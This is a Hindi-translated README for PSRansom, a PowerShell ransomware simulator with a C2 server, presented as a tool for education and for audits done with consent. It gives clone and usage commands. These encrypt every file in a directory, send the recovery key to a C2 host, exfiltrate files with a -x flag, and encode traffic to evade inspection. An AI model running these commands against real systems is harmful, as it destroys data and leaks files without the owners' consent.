
C2 सर्वर के साथ PowerShell रैन्समवेयर सिम्युलेटर

PSRansom एक PowerShell रैनसमवेर सिम्युलेटर है जिसमें C2 सर्वर क्षमताएँ शामिल हैं। यह उपकरण किसी भी सिस्टम पर जहाँ PowerShell स्थापित है, एक सामान्य रैनसमवेर की एन्क्रिप्शन प्रक्रिया का अनुकरण करने में मदद करता है। एकीकृत C2 सर्वर के माध्यम से, आप फ़ाइलों को बाहर निकाल सकते हैं और HTTP के माध्यम से क्लाइंट जानकारी प्राप्त कर सकते हैं।
दोनों तत्वों के बीच सभी संचार एन्क्रिप्टेड या एन्कोडेड होते हैं ताकि ट्रैफ़िक निरीक्षण तंत्र द्वारा पता न लगाया जा सके, हालांकि कभी भी HTTPS का उपयोग नहीं किया जाता है।
पूर्ण रिपॉजिटरी को क्लोन करने या ज़िप फ़ाइल डाउनलोड करने की सिफारिश की जाती है। आप निम्नलिखित कमांड चलाकर ऐसा कर सकते हैं:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: यह उपकरण PowerShell में C2 क्षमताओं के साथ एक सामान्य
रैनसमवेर की एन्क्रिप्शन प्रक्रिया का अनुकरण करने में मदद करता है
Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
सभी फ़ाइलों को एन्क्रिप्ट करता है और पुनर्प्राप्ति कुंजी C2Server को भेजता है
C2Server पर फ़ाइलों को बाहर निकालने और डिक्रिप्ट करने के लिए -x का उपयोग करें
.\PSRansom.ps1 -d Directory -k RecoveryKey
पुनर्प्राप्ति कुंजी स्ट्रिंग के साथ सभी फ़ाइलों को डिक्रिप्ट करता है
Warning: सभी जानकारी बिना किसी एन्क्रिप्शन के C2Server को भेजी जाएगी
फ़ाइलों को पुनर्प्राप्त करने के लिए आपको पहले से उत्पन्न पुनर्प्राप्ति कुंजी की आवश्यकता है
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
यह प्रोजेक्ट GNU 3.0 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - अधिक जानकारी के लिए LICENSE फ़ाइल देखें।
यह उपकरण शुरू से अंत तक Joel Gámez Molina // @JoelGMSec द्वारा बनाया और डिज़ाइन किया गया है।
यह सॉफ़्टवेयर किसी भी प्रकार की गारंटी प्रदान नहीं करता है। इसका उपयोग केवल शैक्षिक वातावरण और/या ग्राहक की सहमति के साथ सुरक्षा ऑडिट के लिए है। मैं इसके दुरुपयोग या इसके कारण होने वाली किसी भी संभावित क्षति के लिए जिम्मेदार नहीं हूँ।
अधिक जानकारी के लिए, आप मुझे Twitter पर @JoelGMSec और मेरे ब्लॉग darkbyte.net पर पा सकते हैं।
आप मेरे काम को एक कॉफी खरीदकर समर्थन कर सकते हैं: